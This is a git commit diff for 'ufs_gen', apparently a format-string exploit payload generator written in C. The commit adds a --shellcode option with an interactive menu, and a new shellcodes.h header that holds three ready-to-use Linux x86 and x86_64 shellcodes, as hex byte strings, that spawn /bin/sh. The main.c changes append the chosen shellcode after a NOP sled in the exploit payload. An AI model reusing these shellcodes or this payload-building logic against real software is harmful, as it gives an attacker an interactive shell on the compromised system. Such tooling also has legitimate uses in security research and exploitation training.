summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--NEWS3
-rw-r--r--main.c67
-rw-r--r--shellcodes.h84
3 files changed, 145 insertions, 9 deletions
diff --git a/NEWS b/NEWS
new file mode 100644
index 0000000..93309ae
--- /dev/null
+++ b/NEWS
@@ -0,0 +1,3 @@
+01/27/14
+The support of the option --shellcode has been implemented.
+When the user specifies this option, a list of common shellcodes is displayed and the user is able to select one of them.
diff --git a/main.c b/main.c
index 1c4bc17..30605f1 100644
--- a/main.c
+++ b/main.c
@@ -24,6 +24,7 @@
#include <stdio.h>
#include <getopt.h>
+#include "shellcodes.h"
static unsigned char payload[4096];
@@ -48,6 +49,11 @@ static char *suffix_g = NULL;
/* how many NOP bytes (0x90) shall we append before suffix */
static int suffix_nops_g = 0;
+/* shall we display a menu with the possible shellcodes ? */
+static bool select_shellcode_g = false;
+
+static char *shellcode_g = NULL;
+
__attribute__((noreturn))
static void usage(const char *arg0)
{
@@ -57,7 +63,9 @@ static void usage(const char *arg0)
fputs(
"ufs_gen "
"[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
- " --override addr --with addr --stackidx idx\n", stderr);
+ " --override addr --with addr --stackidx idx\n"
+ " --shellcode\n"
+ , stderr);
exit(EX_USAGE);
}
@@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[])
OPT_PREFIX,
OPT_SUFFIX,
OPT_SFX_NOPS,
+ OPT_SHELLCODE,
};
static struct option long_options[] = {
- {"override", required_argument, 0, OPT_OVERRIDE},
- {"with", required_argument, 0, OPT_WITH},
- {"stackidx", required_argument, 0, OPT_STACKIDX},
- {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
- {"prefix", required_argument, 0, OPT_PREFIX},
- {"suffix", required_argument, 0, OPT_SUFFIX},
- {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"override", required_argument, 0, OPT_OVERRIDE},
+ {"with", required_argument, 0, OPT_WITH},
+ {"stackidx", required_argument, 0, OPT_STACKIDX},
+ {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
+ {"prefix", required_argument, 0, OPT_PREFIX},
+ {"suffix", required_argument, 0, OPT_SUFFIX},
+ {"sfxnops", required_argument, 0, OPT_SFX_NOPS},
+ {"shellcode", no_argument, 0, OPT_SHELLCODE},
};
int option_index;
@@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[])
case OPT_SFX_NOPS:
suffix_nops_g = atoi(optarg);
break;
+ case OPT_SHELLCODE:
+ select_shellcode_g = true;
+ break;
default:
/*
* we must have accessed an option which we do not have
@@ -198,6 +211,30 @@ int main(int argc, char *argv[])
usage(argv[0]);
}
+ if (select_shellcode_g) {
+ for (;;) {
+ char buffer[256];
+ int sel;
+
+ /* display the name of the common shellcodes */
+ for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
+ fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
+ }
+ fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);
+
+ if (fgets(buffer, sizeof(buffer), stdin) == NULL)
+ break;
+
+ /* check if the selection is valid */
+ sel = atoi(buffer);
+ if (sel <= 0 || sel > SHELLCODE_COUNT)
+ continue;
+
+ shellcode_g = common_shellcodes_g[sel - 1].payload;
+ break;
+ }
+ }
+
if (prefix_g != NULL) {
int len_pfx = strlen(prefix_g);
int mod_len_pfx = len_pfx % address_size_g;
@@ -242,11 +279,23 @@ int main(int argc, char *argv[])
++idx_stack_g;
}
- fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ /* append the NOP bytes */
+ if (suffix_nops_g > 0) {
+ fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+ }
for (int nop = 0; nop < suffix_nops_g; ++nop) {
payload[i++] = '\x90';
}
+ /* append the shellcode */
+ if (shellcode_g != NULL) {
+ fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
+ int len_shellcode = strlen(shellcode_g);
+
+ memcpy(payload + i, shellcode_g, len_shellcode);
+ i += len_shellcode;
+ }
+
if (suffix_g != NULL) {
fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
int len_suffix = strlen(suffix_g);
diff --git a/shellcodes.h b/shellcodes.h
new file mode 100644
index 0000000..679a0d9
--- /dev/null
+++ b/shellcodes.h
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2014 Olivier Gayot
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+
+ * You should have received a copy of the GNU General Public License along
+ * with this program; if not, write to the Free Software Foundation, Inc.,
+ * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+ */
+
+#ifndef SHELLCODES_H
+#define SHELLCODES_H
+
+typedef struct {
+ char *name;
+ char *payload;
+} shellcode_t;
+
+shellcode_t common_shellcodes_g[] = {
+ {
+ .name = "Linux x86\n"
+ "\texecve(\"/bin/sh\", 0, 0)",
+ .payload = "\x68\x2f\x73\x68\xff"
+ "\xfe\x44\x24\x03"
+ "\x68\x2f\x62\x69\x6e"
+ "\x31\xc0"
+ "\xb0\x0b"
+ "\x89\xe3"
+ "\x31\xc9"
+ "\x31\xd2"
+ "\xcd\x80"
+ }, {
+ .name = "Linux x86\n"
+ "\tclose(0); open(\"/dev/tty\", 0); execve(\"/bin/sh\", 0, 0)",
+ .payload = "\x83\xec\x09"
+ "\x31\xc0"
+ "\xb0\x06"
+ "\x31\xdb"
+ "\xcd\x80"
+ "\xc7\x04\x24\x2f\x64\x65\x76"
+ "\xc7\x44\x24\x04\x2f\x74\x74\x79"
+ "\xc0\x6c\x24\x08\x08"
+ "\x31\xc0"
+ "\xb0\x05"
+ "\x89\xe3"
+ "\x31\xc9"
+ "\xcd\x80"
+ "\xc7\x04\x24\x2f\x62\x69\x6e"
+ "\xc7\x44\x24\x04\xff\x2f\x73\x68"
+ "\xb0\x0b"
+ "\x89\xe3"
+ "\xc1\x6b\x04\x08"
+ "\x31\xc9"
+ "\x31\xd2"
+ "\xcd\x80"
+ }, {
+ .name = "Linux x86_64\n"
+ "\texecve(\"/bin/sh\", 0, 0)",
+ .payload = "\x68\x2f\x62\x69\x6e"
+ "\xc7\x44\x24\x04\x2f\x73\x68"
+ "\xff"
+ "\xfe\x44\x24\x07"
+ "\x48\x31\xc0"
+ "\xb0\x3b"
+ "\x48\x89\xe7"
+ "\x48\x31\xf6"
+ "\x48\x31\xd2"
+ "\x0f\x05"
+ },
+};
+
+#define SHELLCODE_COUNT \
+ ((int)(sizeof(common_shellcodes_g) / sizeof(common_shellcodes_g[0])))
+
+
+#endif /* SHELLCODES_H */